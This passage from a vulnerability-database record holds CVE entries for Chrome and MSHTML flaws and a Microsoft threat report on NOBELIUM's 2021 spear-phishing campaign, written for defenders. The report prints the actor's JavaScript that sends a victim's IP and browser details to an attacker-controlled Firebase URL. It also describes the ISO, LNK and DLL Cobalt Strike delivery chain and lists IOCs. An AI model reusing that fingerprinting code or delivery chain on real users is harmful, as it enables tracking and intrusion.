"cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T14:24:01", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21166", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2023-11-07T03:29:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}], "alpinelinux": [{"lastseen": "2023-12-02T17:25:10", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "alpinelinux", "title": "CVE-2021-30551", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2023-11-07T03:33:00", "id": "ALPINE:CVE-2021-30551", "href": "https://security.alpinelinux.org/vuln/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T17:25:10", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "alpinelinux", "title": "CVE-2021-21166", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2023-11-07T03:29:00", "id": "ALPINE:CVE-2021-21166", "href": "https://security.alpinelinux.org/vuln/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-02T14:00:51", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "ubuntucve", "title": "CVE-2021-30551", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-15T00:00:00", "id": "UB:CVE-2021-30551", "href": "https://ubuntu.com/security/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T14:08:08", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote\nattacker to potentially exploit heap corruption via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21166", "href": "https://ubuntu.com/security/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-12-02T16:49:48", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information. Microsoft is aware of reports that exploits for CVE-2021-30551 exist in the wild.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-11T07:00:00", "type": "mscve", "title": "Chromium: CVE-2021-30551 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-11T07:00:00", "id": "MS:CVE-2021-30551", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:49:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-33742", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:50:26", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\n**This CVE has been reported to be exploited in the wild.**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:04:01", "type": "mscve", "title": "Chromium CVE-2021-21166: Object lifecycle issue in audio", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-04T20:04:01", "id": "MS:CVE-2021-21166", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-06-01T20:24:48", "description": "Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the [SUNBURST backdoor](<https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/>), [TEARDROP malware](<https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/>), [GoldMax malware](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>), and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, [Constant Contact](<https://www.constantcontact.com/>), to masquerade as a US-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.\n\nMicrosoft is issuing this alert and new security research regarding this sophisticated [email-based campaign that NOBELIUM has been operating](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>) to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the [Microsoft On The Issues blog](<https://blogs.microsoft.com/on-the-issues/?p=64692>).\n\n> Note: This is an active incident. We will post more details here as they become available.\n> \n> _**Update [05/28/2021]**: We published a new blog post detailing [NOBELIUM&#x27;s latest early-stage toolset](<https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/>), composed of four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. _\n\nNOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an [established pattern](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/>) of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.\n\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service\u2019s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) delivers coordinated defense against this threat. [Microsoft Defender for Office 365](<https://www.microsoft.com/en-us/microsoft-365/security/office-365-defender>) detects the malicious emails, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and take the actions described below in this article.\n\nWe continue to see an increase in sophisticated and [nation-state-sponsored attacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) and, as part of our ongoing threat research and efforts to protect customers, we will continue to [provide guidance](<https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/>) to the security community on how to secure against and respond to these multi-dimensional attacks.\n\n## Spear-phishing campaign delivers NOBELIUM payloads\n\nThe NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that these observations represent changes in the actor\u2019s tradecraft and possible experimentation following widespread disclosures of previous incidents. \n\n### Early testing and initial discovery\n\nAs part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.\n\n### Evolving delivery techniques\n\nIn the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.\n\n\n\n_Figure 1. Example Flow of HMTL/ISO infection chain._\n\nHere&#x27;s an example of target fingerprinting code leveraging Firebase:\n\n`try { \nlet sdfgfghj = ''; \nlet kjhyui = new XMLHttpRequest(); \nkjhyui.open('GET', 'https://api.ipify.org/?format=jsonp?callback=?', false); \nkjhyui.onreadystatechange = function (){ \nsdfgfghj = this.responseText; \n} \nkjhyui.send(null); \nlet ioiolertsfsd = navigator.userAgent; \nlet uyio = window.location.pathname.replace('/',''); \nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj}; \nctryur = JSON.stringify(ctryur); \nlet sdfghfgh = new XMLHttpRequest(); \nsdfghfgh.open('POST', 'https://eventbrite-com-default-rtdb.firebaseio.com/root.json', false); \nsdfghfgh.setRequestHeader('Content-Type', 'application/json'); \nsdfghfgh.send(ctryur); \n} catch (e) {}`\n\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.\n\nThe phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.\n\n### Escalated targeting and delivery\n\nExperimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the _api.ipify.org_ service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\n\nIn May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.\n\nOn May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.\n\nIn the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID _&lt;ashainfo@usaid.gov&gt;,_ while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in _@in.constantcontact.com_, and (which varies for each recipient), and a Reply-To address of &lt;_mhillary@usaid.gov&gt;_ was observed. The emails pose as an alert from USAID, as seen below.\n\n\n\n_Figure 2. Example email screenshot._\n\nIf the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:\n\n_https://r20.rs6[.]net/tn.jsp?f=_\n\nThe user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:\n\n_https://usaid.theyardservice[.]com/d/&lt;target_email_address&gt;_\n\nA malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in the _%USER%\\__AppData\\Local\\Temp\\&lt;random folder name&gt;\\_ path:\n\n * A shortcut, such as _Reports.lnk_, that executes a custom Cobalt Strike Beacon loader\n * A decoy document, such as _ica-declass.pdf_, that is displayed to the target\n * A DLL, such as _Document.dll_, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft\n\n\n\n_Figure 3. ISO file contents. It is worth noting that the \u201cDocuments.dll\u201d is a hidden file._\n\n\n\n_Figure 4. Shortcut which executes the hidden DLL file._\n\nThe end result when detonating the LNK file is the execution of \u201cC:\\Windows\\system32\\rundll32.exe Documents.dll,Open\u201d.\n\nThe successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems. Then, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.\n\nIndicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams to identify actor activity.\n\nMicrosoft security researchers assess that the NOBELIUM\u2019s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.\n\nMicrosoft continues to monitor this threat actor\u2019s evolving activities and will update as necessary. [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) protects customers against the multiple components of this threat: malicious emails, file attachments, connections, malware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection names and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Run [EDR in block mode ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable[ investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Enable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to [secure your accounts](<https://www.microsoft.com/en-us/account/authenticator/>).\n * For Office 365 users, see [multifactor authentication support](<https://docs.microsoft.com/en-us/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide&viewFallbackFrom=o365worldwide>).\n * For Consumer and Personal email accounts, see how to use [two-step verification](<https://support.microsoft.com/en-us/account-billing/how-to-use-two-step-verification-with-your-microsoft-account-c7910146-672f-01e9-50a0-93b4585e7eb4>).\n * Turn on the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat: _Block all Office applications from creating child processes_. NOTE: [Assess rule impact](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/evaluate-attack-surface-reduction?view=o365-worldwide>) before deployment.\n\n## Indicators of compromise (IOC)\n\nThis attack is still active, so these indicators should not be considered exhaustive for this observed activity. These indicators of compromise are from the large-scale campaign launched on May 25, 2021.\n\n \n\nINDICATOR | TYPE | DESCRIPTION \n---|---|--- \nashainfo@usaid.gov | Email | Spoofed email account \nmhillary@usaid.gov | Email | Spoofed email account \n2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 | SHA-256 | Malicious ISO file (container) \nd035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 | SHA-256 | Malicious ISO file (container) \n94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 | SHA-256 | Malicious ISO file (container) \n48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 | SHA-256 | Malicious shortcut (LNK) \nee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c | SHA-256 | Cobalt Strike Beacon malware \nee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 | SHA-256 | Cobalt Strike Beacon malware \nusaid.theyardservice[.]com | Domain | Subdomain used to distribute ISO file \nworldhomeoutlet[.]com | Domain | Subdomain in Cobalt Strike C2 \ndataplane.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \ncdn.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \nstatic.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \n192[.]99[.]221[.]77 | IP address | IP resolved to by _worldhomeoutlet[.]com_ \n83[.]171[.]237[.]173 | IP address | IP resolved to by *_theyardservice[.]com_ \ntheyardservice[.]com | Domain | Actor controlled domain \n \n## Detection details\n\n### Antivirus\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [Trojan:Win32/NativeZone.C!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/NativeZone.C!dha&threatId=-2147185566>)\n\n### Endpoint detection and response (EDR)\n\nAlerts with the following titles in the Security Center can indicate threat activity on your network:\n\n * Malicious ISO File used by NOBELIUM\n * Cobalt Strike Beacon used by NOBELIUM\n * Cobalt Strike network infrastructure used by NOBELIUM\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * An uncommon file was created and added to startup folder.\n * A link file (LNK) with unusual characteristics was opened.\n\n## Advanced hunting\n\n### Microsoft 365 Defender\n\n**NOTE:** The following sample queries lets you search for a week&#x27;s worth of events. To explore up to 30 days\u2019 worth of raw data to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week, go to the **Advanced Hunting** page &gt; **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\nTo locate possible exploitation activity, run the following query in the Microsoft 365 security center:\n\n##### NOBELIUM abuse of USAID Constant Contact resources in email data\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. [Run query in Microsoft 365 security 